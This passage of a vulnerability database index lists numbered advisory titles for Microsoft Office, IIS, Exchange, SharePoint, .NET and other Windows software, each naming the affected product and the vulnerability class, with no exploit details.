Office 2007/2010/2011 memory corruption [90704] Microsoft Office 2013/2013 RT/2016 memory corruption [90703] Microsoft Office 2007/2010/2013/2013 RT/2016 memory corruption [90249] Microsoft Exchange Outlook Web Access privilege escalation [90169] Microsoft IIS PUT Request privilege escalation [89653] Microsoft IIS /cgi-bin/ Directory information disclosure [89597] Microsoft IIS 5.0 Download.Ject Trojan privilege escalation [89581] Microsoft ISA Server information disclosure [89568] Microsoft IIS ASP.NET information disclosure [89524] Microsoft ISA Server SSL Packet denial of service [89487] Microsoft Exchange information disclosure [89349] Microsoft IIS Passive FTP Connection information disclosure [89298] Microsoft SQL Server Version information disclosure [89286] Microsoft MSN Messenger IP Address information disclosure [89220] Microsoft IIS on WinNT4 IDC File Path information disclosure [89195] KpyM Windows Telnet Server privilege escalation [89179] Jordan Windows Telnet 1.0/1.2 memory corruption [89043] Microsoft Office up to 2016 memory corruption [89042] Microsoft Word Viewer memory corruption [89041] Microsoft Office up to 2016 memory corruption [89040] Microsoft Office 2010 SP2/2011/2013 RT SP1/2013 SP1/2016 memory corruption [89039] Microsoft Office 2007 SP3/2010 SP2/2011/2013 RT SP1/2013 SP1 memory corruption [89038] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 Security Feature 7PK Security Features [89037] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [88885] Microsoft Office 2000 SP1 Service Pack 2 privilege escalation [88829] Symantec Norton Antivirus on Windows Client IDS Driver memory corruption [88828] Symantec Endpoint Protection on Windows Client IDS Driver memory corruption [88761] Microsoft IIS privilege escalation [88654] Microsoft IIS 4.0 Remote Administration Script privilege escalation [88653] Microsoft Exchange 5.0/5.5 IMAP Service weak authentication [88616] Microsoft IIS privilege escalation [88583] Microsoft IIS 2.0/2.5 URLScan information disclosure [88289] Microsoft IIS Sample Files information disclosure [88260] Microsoft IIS bdir.htr information disclosure [88256] Microsoft SQL Server weak authentication [88254] Microsoft IIS 5.0 IDC File cross site scripting [88247] Microsoft IIS 5.0 Sample Application Form_JScript.asp cross site scripting [88243] Microsoft IIS /scripts/repost.asp File privilege escalation [88241] Microsoft IIS 5.0 Sample Application /iissamples Path information disclosure [88143] Microsoft Outlook S/MIME EmailAddress weak authentication [87956] Microsoft Exchange 2013/2016 Oracle Outside In Libraries information disclosure [87955] Microsoft Exchange 2007/2010/2013/2016 Oracle Outside In Libraries privilege escalation [87954] Microsoft Exchange 2007/2010/2013/2016 Oracle Outside In Libraries privilege escalation [87953] Microsoft Exchange 2007/2010/2013/2016 Oracle Outside In Libraries privilege escalation [87939] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 OLE DLL privilege escalation [87938] Microsoft Office 2007 SP3/2010 SP2/2011 information disclosure [87937] Microsoft Office 2007 SP3/2010 SP2/2011 memory corruption [87936] Microsoft Office up to 2016 privilege escalation [87626] VMware vCenter Server up to 5.1/5.5/6.0 on Windows cross site scripting [87541] VMware Workstation/Player on Windows privilege escalation [87168] Microsoft .NET Framework up to 4.6.1 TLS/SSL information disclosure [87149] Microsoft Office up to 2016 memory corruption [87148] Microsoft Office 2010 Graphics privilege escalation [87147] Microsoft Office 2007/2010 memory corruption [87146] Microsoft Office 2011/2013/2013 RT/2016 memory corruption [84364] Microsoft PowerPoint 2000/2002/2003 mso.dll memory corruption [84255] Microsoft Office privilege escalation [83849] Microsoft Office privilege escalation [82354] Microsoft IIS WebDAV denial of service [82229] Microsoft Excel 2010 SP2 Office Document memory corruption [82228] Microsoft Excel 2007 SP3/2010 SP2 Office Document memory corruption [82225] Microsoft Word 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1 Office Document memory corruption [82224] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 Office Document memory corruption [81890] Microsoft IIS advsearch.asp denial of service [81889] Microsoft IIS query.asp denial of service [81888] Microsoft IIS search.asp denial of service [81769] Microsoft IIS 4.0/5.0 cmd.exe privilege escalation [81731] Microsoft IIS ASP.NET Path information disclosure [81558] Red Hat WildFly up to 10.0.0 on Windows Blacklist Filter File information disclosure [81274] Microsoft Office up to 2016 memory corruption [81273] Microsoft Office 2007/2010/2013/2016 privilege escalation [81272] Microsoft Office 2007/2010/2013 memory corruption [80886] Microsoft SharePoint Foundation 2013 SP1 cross site scripting [80872] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [80871] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [80870] Microsoft Office up to 2016 memory corruption [80869] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 memory corruption [80868] Microsoft Office up to 2016 memory corruption [80867] Microsoft Office up to 2016 memory corruption [80826] Oracle Java SE 6u111/7u95/8u71/8u72 on Windows Install privilege escalation [80733] cURL up to 7.46.x on Windows privilege escalation [80231] Microsoft Excel up to 2016 Office Document memory corruption [80229] Microsoft Exchange Server 2013 CU 10/2013 CU 11/2013 SP1/2016 Outlook Web Access cross site scripting [80228] Microsoft Exchange Server 2016 Outlook Web Access cross site scripting [80227] Microsoft Exchange Server 2013 CU 10/2013 SP1/2016 Outlook Web Access cross site scripting [80226] Microsoft Exchange Server 2016 Outlook Web Access cross site scripting [80218] Microsoft Office up to 2016 ASLR information disclosure [80217] Microsoft SharePoint Foundation 2013 SP1 Access Control Policy cross site scripting [80216] Microsoft Office up to 2016 Office Document memory corruption [80206] Microsoft SharePoint Foundation 2013 SP1 Access Control Policy cross site scripting [79863] Samba up to 4.3.2 Windows Active Directory Server privilege escalation [79745] Microsoft Office Font File memory corruption [79744] Microsoft Office Font File memory corruption [79743] Microsoft Office Font File memory corruption [79742] Microsoft Skype Font File memory corruption [79741] Microsoft Skype Font File memory corruption [79740] Microsoft Skype Font File memory corruption [79739] Microsoft .NET Framework up to 4.6 Font File memory corruption [79505] Microsoft Office 2007 memory corruption [79504] Microsoft Office 2007/2010/2013/2016 privilege escalation [79503] Microsoft Office 2007/2010/2013 memory corruption [79502] Microsoft Office 2007/2010/2011 memory corruption [79501] Microsoft Office 2007/2010 memory corruption [79500] Microsoft Office 2010/2011/2016 memory corruption [79190] Microsoft Word 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 Office Document memory corruption [79189] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1/2016 Office Document memory corruption [79187] Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016 Sandbox privilege escalation [79186] Microsoft Lync/Skype for Business cross site scripting [79181] Microsoft .NET Framework up to 4.6 ASLR information disclosure [79180] Microsoft .NET Framework up to 4.6 cross site scripting [79179] Microsoft .NET Framework up to 4.6 information disclosure [79177] Microsoft Office/SharePoint memory corruption [79176] Microsoft Office/SharePoint memory corruption [79175] Microsoft Office/SharePoint memory corruption [79117] Microsoft Outlook 2011/2016 on Mac HTML cross site scripting [78706] ownCloud Server up to 7.0.5/8.0.3 on Windows routing directory traversal [78375] Microsoft SharePoint Server/SharePoint Foundation 2013 SP1 cross site scripting [78374] Microsoft SharePoint Server/Office Web Apps cross site scripting [78373] Microsoft Excel/SharePoint Server fileVersion memory corruption [78371] Microsoft SharePoint Server 2007 SP3/2010 SP2 InfoPath Forms Services information disclosure [78370] Microsoft Excel/SharePoint Server Object calculatedColumnFormula memory corruption [77710] PHP up to 5.6.12 on Windows CLI Server memory corruption [77702] Corel WordPerfect Microsoft Word Document Conversion memory corruption [77646] Microsoft Office 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1 EPS Image privilege escalation [77645] Microsoft Exchange Server 2013 CU8/2013 CU9 Outlook Web Access cross site scripting [77644] Microsoft Exchange Server 2013 CU8/2013 CU9 Outlook Web Access cross site scripting [77641] Microsoft Lync Server/Skype for Business Server cross site scripting [77638] Microsoft Lync Server 2013 cross site scripting [77637] Microsoft Lync Server/Skype for Business Server cross site scripting [77632] Microsoft .NET Framework up to 4.6 MVC Code [77629] Microsoft Excel 2007 SP3/2010 SP2/2011/2016 Office Document memory corruption [77628] Microsoft SharePoint Foundation 2013 SP1 cross site scripting [77627] Microsoft Excel 2007 SP3/2010 SP2 Office Document memory corruption [77626] Microsoft Excel 2007 SP3/2010 SP2/2011/2016 Office Document memory corruption [77617] Microsoft Office 2007 SP3/2010 SP2 OpenType Font memory corruption [77612] Microsoft Exchange Server 2013 CU8/2013 CU9 Outlook Web Access information disclosure [77611] Microsoft .NET Framework up to 4.6 Array Copy memory corruption [77331] Apache ActiveMQ up to 5.11.1 on Windows Fileserver Upload/Download directory traversal [77252] Microsoft Office 2007 SP3/2010 SP2 Office Graphics Library Font privilege escalation [77053] Microsoft .NET Framework 4.6 RyuJIT Optimization privilege escalation [77052] Microsoft .NET Framework 4.6 RyuJIT Optimization privilege escalation [77051] Microsoft .NET Framework 4.6 RyuJIT Optimization privilege escalation [77050] Microsoft Office up to 2016 memory corruption [77049] Microsoft Office up to Word Viewer Numeric Error [77048] Microsoft Office up to Word Viewer memory corruption [77047] Microsoft Office up to Word Viewer memory corruption [77046] Microsoft Office up to Word Viewer memory corruption [77045] Microsoft Office up to Word Viewer privilege escalation [77044] Microsoft Office up to Word Viewer Command Line Parameter information disclosure [77043] Microsoft Office up to Word Viewer memory corruption [76497] Microsoft PowerPoint 2007 SP3/2010 SP2/2013 SP1 Office Document memory corruption [76491] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1 Office Document memory corruption [76467] Microsoft Word 2007 SP3/2010 SP2/2011/2013 RT SP1/2013 SP1 Office Document memory corruption [76466] Microsoft Word 2007 SP3/2010 SP2/2011/2013 RT SP1/2013 SP1 Office Document memory corruption [76464] Microsoft Excel 2007 SP3/2010 SP2/2013 RT SP1/2013 SP1 Office Document memory corruption [76463] Microsoft Excel 2007 SP3/2010 SP2/2011/2013 RT SP1/2013 SP1 Office Document memory corruption [76462] Microsoft Excel/SharePoint Server ASLR information disclosure [76440] Microsoft SQL Server 2008/2008 R2/2012/2014 Virtual Function privilege escalation [76439] Microsoft SQL Server 2008/2008 R2/2012/2014 privilege escalation [76438] Microsoft SQL Server 2008/2008 R2/2012/2014 Pointer Casting privilege escalation [76399] VMware Workstation/Player/Horizon View Client on Windows Discretionary Access Control List privilege escalation [75793] Microsoft Exchange Server 2013 CU8 cross site scripting [75792] Microsoft Exchange Server 2013 SP1 CU8 cross site request forgery [75791] Microsoft Office 2013 SP1 Office Document Data Processing Error [75787] Microsoft Exchange Server 2013 SP1 CU8 Same Origin Policy privilege escalation [75786] Microsoft Office 2010 SP2/2013 RT SP1/2013 SP1 Office Document Data Processing Error [75785] Microsoft Office Compatibility Pack SP3 Office Document Data Processing Error [75707] Cisco Unified MeetingPlace for Microsoft Outlook 8.6(1.2)/ 8.6(1.9) cross site scripting [75685] Skype on Windows/Android/iOS IM denial of service [75399] Trend Micro ScanMail for Microsoft Exchange up to 10.2/11.0 Session ID Generator weak encryption [75340] Microsoft .NET Framework up to 4.5.2 WinForms privilege escalation [75339] Microsoft .NET Framework up to 4.5.2 XML weak encryption [75338] Microsoft SharePoint 2007/2010/2013 Content privilege escalation [75337] Microsoft Office 2007 SP3/2010 SP2/2011/2013 RT SP1/2013 SP1 memory corruption [75336] Microsoft Office 2007 SP3/2010 SP2/2011/2013 RT SP1/2013 SP1 memory corruption [74848] Microsoft SharePoint Foundation/SharePoint Server 2013 SP1 cross site scripting [74846] Microsoft Word/Word Viewer/Office Compatibility Pack Document memory corruption [74845] Microsoft Office 2007/2010/2013 Document memory corruption [74844] Microsoft Office 2007/2010 Document memory corruption [74843] Microsoft .NET Framework up to 4.5.2 ASP.NET Data Processing Error [74837] Microsoft Office 2007/2010/2011/2013 RTF Document denial of service [74836] Microsoft Project Server 2010 SP2/2013 SP1 cross site scripting [74835] Microsoft Office 2011 on Mac cross site scripting [74393] Microsoft SharePoint Server 2013 Foundation cross site scripting [74016] Microsoft .NET Framework 4.03 PML File memory corruption [73979] Microsoft Exchange Server 2003 CU7/2003 SP1 Meeting privilege escalation [73978] Microsoft Exchange Server 2003 CU7/2003 SP1 cross site scripting [73977] Microsoft Exchange Server 2003 CU7/2003 SP1 cross site scripting [73976] Microsoft Exchange Server 2003 CU7/2003 SP1 cross site scripting [73975] Microsoft Exchange Server 2003 CU7/2003 SP1 cross site scripting [73967] Microsoft Office up to 2013 SP1 Office File Data Processing Error [73966] Microsoft Office up to 2013 SP1 RTF File denial of service [73965] Microsoft Office up to 2013 SP1 memory corruption [73964] Microsoft SharePoint 2007/2010/2013 cross site scripting [73200] Microsoft Exchange Server cross site scripting [73199] Microsoft Exchange Server cross site scripting [71337] Microsoft Office 2000/2004/XP privilege escalation [71152] clearhub Windows Live Hotmail PUSH mail 1.00.97 X.509 Certificate weak encryption [70617] Microsoft Outlook.com Certificates weak encryption [69467] Microsoft IIS 4.0/5.0/5.06/5.1 privilege escalation [69158] Microsoft Office 2007/2010/2013 memory corruption [69157] Microsoft Office 2007/2010/2013 OneTableDocumentStream denial of service [69156] Microsoft Office 2010 Object denial of service [69155] Microsoft Excel -/2007/2010/2013 Object denial of service [62914] Microsoft Office 2003 SP3/2007 SP3/2008/2010 SP1/2011 Spreadsheet denial of service [62238] Microsoft Visual Studio Team Foundation Server 2010 cross site scripting [61434] nginx 1.2.0/1.3.0 on Windows Access Restriction privilege escalation [60711] Microsoft .NET Framework 4.0 denial of service [60205] Microsoft .NET Framework 2.0 SP2/3.5.1 privilege escalation [59908] Microsoft Anti-cross Site Scripting Library 3.1 cross site scripting [58992] Microsoft .NET Framework 1.0 SP3/1.1 SP1/2.0 SP2/3.5.1/4 privilege escalation [58492] Microsoft SharePoint Server 2007 Spreadsheet memory corruption [58491] Microsoft Office 2004/2007/2008/2010/2011 Spreadsheet privilege escalation [58490] Microsoft Office Compatibility Pack 2007 Spreadsheet memory corruption [58489] Microsoft Office 2004/2007/2008/2010/2011 Spreadsheet memory corruption [58488] Microsoft Office 2007/2010 privilege escalation [58487] Microsoft SharePoint Foundation 2010 cross site scripting [58486] Microsoft SharePoint Foundation 2010 Reflected cross site scripting [58485] Microsoft SharePoint Foundation 2010 EditForm.aspx cross site scripting [58239] Microsoft Visual Studio cross site scripting [57691] Microsoft SQL Server 2008 Web Service information disclosure [57690] Microsoft Excel 2002/2003 Spreadsheet memory corruption [57689] Microsoft Excel 2002 Spreadsheet memory corruption [57688] Microsoft Excel 2002 Spreadsheet memory corruption [57687] Microsoft Excel 2002/2003/2007 Spreadsheet memory corruption [57686] Microsoft Excel 2002 Spreadsheet memory corruption [57685] Microsoft Excel 2002/2003/2007 Array Access memory corruption [57684] Microsoft Excel 2002/2003/2007/2010 Spreadsheet memory corruption [57420] Microsoft PowerPoint 2002/2003 memory corruption [57410] Microsoft .NET Framework 3.5 SP1/3.5.1/4.0 Access Restriction privilege escalation [57278] Wireshark 1.4.0/1.4.1/1.4.2/1.4.3/1.4.4 on Windows NFS Dissector Numeric Error [57079] Microsoft PowerPoint 2002/2003/2007/2010 privilege escalation [57078] Microsoft Office 2003/2007/Xp docx unknown vulnerability [57077] Microsoft Excel 2002 memory corruption [57076] Microsoft Excel 2002/2003 memory corruption [57075] Microsoft Excel 2002/2003 memory corruption [57074] Microsoft Excel 2002 memory corruption [57073] Microsoft Excel 2002/2003/2007/2010 Numeric Error [57072] Microsoft Excel -/2002/2003/2007/2010 Numeric Error [56475] Microsoft Office 2004/2008 privilege escalation [56474] Microsoft Office Compatibility Pack Spreadsheet privilege escalation [56473] Microsoft Office Compatibility Pack memory corruption [55770] Microsoft Office Xp memory corruption [55769] Microsoft Office Xp memory corruption [55768] Microsoft Office Xp memory corruption [55767] Microsoft Office Xp memory corruption [55766] Microsoft Office Xp memory corruption [55765] Microsoft Office 2003/Xp Numeric Error [55764] Microsoft Office 2003/Xp memory corruption [55420] Microsoft Office 2007/2010 memory corruption [55419] Microsoft Office 2004/2008/2011/Xp memory corruption [55418] Microsoft Office up to Xp memory corruption [55417] Microsoft Office up to Xp memory corruption [55416] Microsoft Office up to Xp memory corruption [55412] Microsoft PowerPoint Viewer 2007 Numeric Error [55411] Microsoft PowerPoint 2002/2003 memory corruption [54995] Microsoft Office 2004/2008 privilege escalation [54994] Microsoft Office 2004/2008 privilege escalation [54993] Microsoft Office Compatibility Pack 2007 privilege escalation [54992] Microsoft Excel 2002 privilege escalation [54991] Microsoft Office 2004 Future privilege escalation [54990] Microsoft Office 2004 privilege escalation [54989] Microsoft Office 2004/2008 privilege escalation [54988] Microsoft Excel 2002 privilege escalation [54987] Microsoft Excel 2002 privilege escalation [54986] Microsoft Excel 2002/2003 privilege escalation [54985] Microsoft Office Compatibility Pack 2003/2004/2007/2008 privilege escalation [54984] Microsoft Office 2004/2008 privilege escalation [54983] Microsoft Excel 2002 Numeric Error [54980] Microsoft Word 2002/2003 privilege escalation [54979] Microsoft Word 2002 privilege escalation [54978] Microsoft Word 2002 privilege escalation [54977] Microsoft Word 2002 privilege escalation [54976] Microsoft Word 2002 denial of service [54975] Microsoft Word 2002 privilege escalation [54974] Microsoft Word 2002 privilege escalation [54973] Microsoft Word 2002 privilege escalation [54972] Microsoft Word 2002 privilege escalation [54971] Microsoft Word 2002 privilege escalation [54774] Microsoft Word 2003 word_crash_11.8326.8324_poc.doc denial of service [54757] Microsoft SharePoint Server 2007 HTML Sanitization SafeHTML cross site scripting [54719] Microsoft IIS 5.1 Access Restriction weak authentication [54617] Microsoft Outlook Web Access up to 2007 cross site request forgery [54550] Microsoft PowerPoint 2007 rpawinet.dll privilege escalation [54549] Microsoft PowerPoint 2010 pptimpconv.dll memory corruption [54322] Microsoft Word 2002/2003 privilege escalation [54321] Microsoft Office Compatibility Pack 2007 memory corruption [54320] Microsoft Office Compatibility Pack 2007 privilege escalation [54319] Microsoft Office Compatibility Pack 2007 privilege escalation [54318] Microsoft .NET Framework 2.0 SP1/2.0 SP2/3.5/3.5 SP1/3.5.1 Interfaces privilege escalation [54083] Microsoft Access 2003 ActiveX Control ACCWIZ.dll privilege escalation [53508] Microsoft SharePoint Services 3.0 denial of service [53507] Microsoft IIS 6.0/7.0/7.5 privilege escalation [53505] Microsoft Excel 2002/2007 privilege escalation [53504] Microsoft Excel 2002 privilege escalation [53503] Microsoft Excel 2002 privilege escalation [53502] Microsoft Excel 2002 privilege escalation [53501] Microsoft Excel 2002 privilege escalation [53500] Microsoft Excel 2002 privilege escalation [53499] Microsoft Excel 2002 privilege escalation [53498] Microsoft Excel 2002 privilege escalation [53497] Microsoft Excel 2002 privilege escalation [53496] Microsoft Excel 2002 privilege escalation [53495] Microsoft Excel 2002/2003/2007 privilege escalation [53494] Microsoft Excel 2002 privilege escalation [53493] Microsoft Excel 2002/2003/2007 privilege escalation [53385] Microsoft Exchange Server 2007 Outlook Web Access cross site scripting [53367] Microsoft .NET Framework 1.0 Default Configuration cross site scripting [53164] Microsoft Office 2003/2007/Xp ActiveX Control VBE6.DLL privilege escalation [52430] Microsoft Wireless Keyboard Encryption XOR weak encryption [52148] Microsoft Office 2004/2007/2008 privilege escalation [52147] Microsoft Office 2004/2007/2008 Spreadsheet privilege escalation [52146] Microsoft Office 2004/2007/2008 Spreadsheet memory corruption [52145] Microsoft Office 2004/2007/2008 Spreadsheet privilege escalation [52144] Microsoft Office 2004/2007/2008 Spreadsheet privilege escalation [52143] Microsoft Office 2004/2007/2008 Spreadsheet privilege escalation [51995] Microsoft SharePoint Server up to 2006 cross site scripting [51810] Microsoft Office 2004/Xp MSO.DLL memory corruption [51802] Microsoft PowerPoint 2003 memory corruption [51801] Microsoft PowerPoint 2003 memory corruption [51800] Microsoft PowerPoint 2002/2003 privilege escalation [51799] Microsoft PowerPoint 2002/2003 privilege escalation [51798] Microsoft PowerPoint 2002/2003 memory corruption [51758] Microsoft IIS 6.0 cross site scripting [51338] Microsoft IIS up to 6.0 asp:.jpg privilege escalation [51074] Microsoft Office 2002/2003 Numeric Error [50812] Citrix Online Plug-in up to 11.0 on Windows weak encryption [50794] Microsoft Office 2004/2008 Spreadsheet privilege escalation [50793] Microsoft Office 2004/2008 Spreadsheet privilege escalation [50792] Microsoft Office 2004/2008 Spreadsheet privilege escalation [50791] Microsoft Office 2004/2008 Spreadsheet privilege escalation [50790] Microsoft Office 2004/2008 Spreadsheet memory corruption [50789] Microsoft Office 2004/2008 Spreadsheet privilege escalation [50788] Microsoft Office 2004/2008 Spreadsheet privilege escalation [50787] Microsoft Office 2004/2008 Spreadsheet privilege escalation [50660] Microsoft SharePoint Server 2007 privilege escalation [50443] Microsoft PowerPoint 2007 Numeric Error [50437] Microsoft .NET Framework 1.1 SP1/2.0 SP2 GDI+ Numeric Error [50432] Microsoft .NET Framework 2.0/2.0 SP1/2.0 SP2/3.5/3.5 SP1 privilege escalation [50155] PHP on Windows C Runtime _fdopen Format String [50139] Microsoft Enterprise Library 4.0 Format String [49699] Sophos PureMessage for Microsoft Exchange Installation denial of service [49698] Sophos PureMessage for Microsoft Exchange EdgeTransport.exe denial of service [49697] Sophos PureMessage for Microsoft Exchange Message Queue PMScanner.exe denial of service [49395] Microsoft Office 2000/2003/XP Office Web Components memory corruption [49390] Microsoft Office 2000/2003/XP Office Web Components memory corruption [49389] Microsoft Office 2000/2003/XP Office Web Components denial of service [49272] XEmacs 21.4.22 on Windows glyphs-eimage.c jpeg_instantiate Numeric Error [49198] Microsoft Visual Studio 2005 information disclosure [49191] Microsoft Visual Studio Error privilege escalation [49044] Microsoft ISA Server 2006 privilege escalation [48572] Microsoft PowerPoint 2002 FL21WIN.DLL privilege escalation [48554] Microsoft Excel 2000/2003/2007 privilege escalation [48549] Microsoft IIS 5.0 weak authentication [48548] Microsoft Office up to Xp Numeric Error [48547] Microsoft Office up to Xp denial of service [48546] Microsoft Office up to Xp privilege escalation [48545] Microsoft Office up to Xp privilege escalation [48544] Microsoft Office up to Xp privilege escalation [48543] Microsoft Office up to Xp privilege escalation [48518] Microsoft ADAM XP Active Directory denial of service [48515] Microsoft Office Word Viewer 2003 memory corruption [48514] Microsoft Office Word Viewer 2003 memory corruption [48498] Microsoft IIS 5.0/5.1/6.0 Password Protection weak authentication [48409] IBM DB2 8.0/9.1/9.5 on Windows Configuration [48157] Microsoft PowerPoint 2002 Sound memory corruption [48156] Microsoft PowerPoint 2000 memory corruption [48155] Microsoft PowerPoint 2002 Notes Container memory corruption [48154] Microsoft PowerPoint 2002 Sound PP7X32.DLL memory corruption [48153] Microsoft PowerPoint 2002 Sound privilege escalation [48152] Microsoft PowerPoint 2002 PP4X32.DLL memory corruption [48151] Microsoft PowerPoint 2002 memory corruption [48150] Microsoft PowerPoint 2002 Sound privilege escalation [48149] Microsoft PowerPoint 2002 privilege escalation [48148] Microsoft PowerPoint 2002 Sound privilege escalation [48147] Microsoft PowerPoint 2002 Sound privilege escalation [48146] Microsoft PowerPoint 2002 Numeric Error [47718] Microsoft Excel 2000/2002/2003/2007 Spreadsheet denial of service [47716] Microsoft Office Converter Pack 2003 WPFT632.CNV privilege escalation [46594] Trend Micro InterScan Web Security Virtual Appliance 3.1 Windows Media Player information disclosure [46455] Microsoft Exchange Server 2007 privilege escalation [46454] Microsoft Exchange Server 2007 denial of service [46343] F-Secure Anti-Virus up to 8.00 on Windows Numeric Error [46327] Microsoft Word 2007 information disclosure [45388] CA ARCserve Backup up to R12.0 on Windows memory corruption [45379] Microsoft Office SharePoint Server 2007 weak authentication [45375] Symantec Backup Exec 12.0 on Windows memory corruption [45374] Symantec Backup Exec 12.0 on Windows weak authentication [45131] Microsoft Office Communicator denial of service [45130] Microsoft Office Communicator denial of service [45040] Microsoft .NET Framework 2.0.50727 Code Access Security weak encryption [44970] Novell eDirectory up to 8.8 on Windows denial of service [44958] Microsoft SharePoint Server cross site scripting [44855] DjVu Activex Control For Microsoft Office 2000 3.0 ActiveX Control DjVu_ActiveX_MSOffice.dll memory corruption [44665] Microsoft Peachtree Accounting 2004 ActiveX Control PAWWeb11.ocx unknown vulnerability [44589] Microsoft Exchange Server 2003 Outlook Web Access directory traversal [44238] Microsoft iis ActiveX Control iisext.dll privilege escalation [44237] Microsoft iis ActiveX Control adsiis.dll privilege escalation [44047] Microsoft SQL Server 2000 ActiveX Control SQLVDIRLib.SQLVDirControl memory corruption [43957] Microsoft Office 2003/2007/Xp gdiplus.dll Numeric Error [43956] Microsoft Office 2003/2007/Xp gdiplus.dll memory corruption [43955] Microsoft Office 2003/2007/Xp gdiplus.dll denial of service [43952] Microsoft Office 2003/2007/Xp URI privilege escalation [43822] Microsoft .NET Framework 1.1 Request Validation cross site scripting [43821] Microsoft .NET Framework 1.1 Request Validation cross site scripting [43723] Microsoft Visual Studio Masked Edit Control Msmask32.ocx memory corruption [43662] Microsoft PowerPoint Viewer 2000 SP3/2002 SP3/2003 SP2/2007 SP1 denial of service [43661] Microsoft PowerPoint Viewer 2003 denial of service [43660] Microsoft PowerPoint Viewer 2003 denial of service [43657] Microsoft Office 2000/2003/Xp denial of service [43654] Microsoft SharePoint Server 2007 denial of service [43653] Microsoft Office 2000/2002/2004/2008 privilege escalation [43652] Microsoft Office 2000/2002/2003/2004/2008 privilege escalation [43103] Microsoft Exchange Srv 2007 Sp1 Outlook Web Access cross site scripting [43087] Microsoft Office Snapshot Viewer ActiveX up to Office 2003 Snapshot Viewer ActiveX Control snapview.ocx privilege escalation [42966] Novell iPrint Client up to 4.34 Client for Windows ienipp.ocx memory corruption [42816] Microsoft Word 2000/2003 denial of service [42326] Microsoft Office up to Xp denial of service [42317] TFTP Server SP 1.4/1.5 on Windows memory corruption [42065] Microsoft SharePoint Server 2.0 Rich Text Editor cross site scripting [41881] Microsoft Office 2003/2007/2007 Sp1/Xp denial of service [41880] Microsoft Project 2000/2002/2003 denial of service [41613] BootManage TFTPD Windows memory corruption [41455] Microsoft Office 2000/2003/2004/Xp privilege escalation [41454] Microsoft Excel 2000/2002/2003/2007 memory corruption [41453] Microsoft Excel 2000/2002/2003 privilege escalation [41452] Microsoft Excel 2000/2002/2003/2007 privilege escalation [41451] Microsoft Excel 2000/2002/2003 privilege escalation [41450] Microsoft Excel 2000 privilege escalation [41449] Microsoft Excel 2000/2002/2003 privilege escalation [41448] Microsoft Office 2000/Xp Office Web Components privilege escalation [41289] Symantec Backup Exec 12.0 on Windows ActiveX Control pvcalendar.ocx privilege escalation [41288] Symantec Backup Exec 12.0 on Windows ActiveX Control pvcalendar.ocx memory corruption [41003] Microsoft Office 2000/2003/2004/Xp denial of service [41002] Microsoft Office 2000/2003/Xp denial of service [40985] Microsoft IIS up to 6.0 privilege escalation [40084] 3ivx Mpeg-4 Codec 4.5.1 Windows Media Player mplayer2.exe memory corruption [40042] Microsoft Access memory corruption [40020] Microsoft Office 2007 ZIP Container privilege escalation [38957] Microsoft SQL Server privilege escalation [38899] Microsoft ISA Server 2004 information disclosure [38782] Microsoft Visual Studio up to 6.0 ActiveX Control pdwizard.ocx privilege escalation [38728] Microsoft SQL Server 2005 Enterprise Manager sqldmo.dll memory corruption [38595] Microsoft MSN Messenger 7.0 memory corruption [38253] Microsoft Visual Studio 6.0 ActiveX Control vdt70.dll NotSafe memory corruption [38184] Atheros 802.11 ABG Wireless Adapter Driver up to 802.10 on Windows denial of service [38026] Sun Java System Application Server up to 8.2 on Windows unknown vulnerability [37739] Microsoft Excel 2000/2002/2003/2004/2007 memory corruption [37738] Microsoft Office 2002/2003 memory corruption [37566] Microsoft Excel 2003 unknown vulnerability [37508] Microsoft MSN Messenger 4.7 denial of service [37352] Microsoft Office DataSourceControl memory corruption [37173] Microsoft Office htimage.exe unknown vulnerability [37010] Microsoft Office 2000 ActiveX Control ouactrl.ocx memory corruption [37004] Microsoft IIS memory corruption [36628] Microsoft Word 2000/2002/2003/2004 winword.exe privilege escalation [36621] Microsoft Exchange Server 2000 Numeric Error [36620] Microsoft Exchange Server 2000 Outlook Web Access cross site scripting [36619] Microsoft Exchange Server 2000/2003/2007 MIME memory corruption [36618] Microsoft Exchange Server 2000 denial of service [36617] Microsoft Excel 2000/2002/2003/2004 memory corruption [36051] Microsoft Word 2007 file798-1.doc memory corruption [36050] Microsoft Word 2007 file789-1.doc memory corruption [36041] Microsoft .NET Framework 2.0.50727.42 cross site scripting [35684] Microsoft Visual Studio mfc42u.dll afxoleseteditmenu memory corruption [35373] Microsoft Excel 2003 denial of service [35372] Microsoft Office 2003 denial of service [35161] Microsoft ISA Server 2004 unknown vulnerability [35011] Microsoft PowerPoint memory corruption [35001] Microsoft Office 2000/2003/2004/Xp privilege escalation [35000] Microsoft Word 2000/2002/2003 privilege escalation [34993] Microsoft Office 2000/2003/Xp memory corruption [34991] Microsoft Visual Studio 8.0 msvcr80.dll denial of service [34592] Microsoft Visual Studio 6.0 msdev.exe memory corruption [34322] Microsoft Office 2000/2003/Xp memory corruption [34321] Microsoft Office 2000/2003/2004/Xp Spreadsheet memory corruption [34320] Microsoft Office 2000/2003/2004/Xp memory corruption [34319] Microsoft Office 2000/2003/2004/Xp memory corruption [34318] Microsoft Office 2000/2003/2004/Xp memory corruption [34253] Microsoft IIS denial of service [34126] Microsoft Office 2003 memory corruption [34122] Microsoft Office Web Components 2000 privilege escalation [33866] Microsoft IIS 5.1 Web Directory com privilege escalation [33851] Microsoft Word 2000/2002/2003 12122006-djtest.doc memory corruption [33766] Microsoft Word 2000/2002/2003 memory corruption [33067] Microsoft Visual Studio .net 2005 ActiveX Control wmiscriptutils.dll memory corruption [32693] Microsoft Word 2004 memory corruption [32690] Microsoft Office 2000/2003/2004/Xp privilege escalation [32689] Microsoft Excel 2000/2002/2003/2004/XP memory corruption [32688] Microsoft Excel 2000/2002/2003/2004/XP memory corruption [32687] Microsoft Word 2000/2002 memory corruption [32686] Microsoft Office 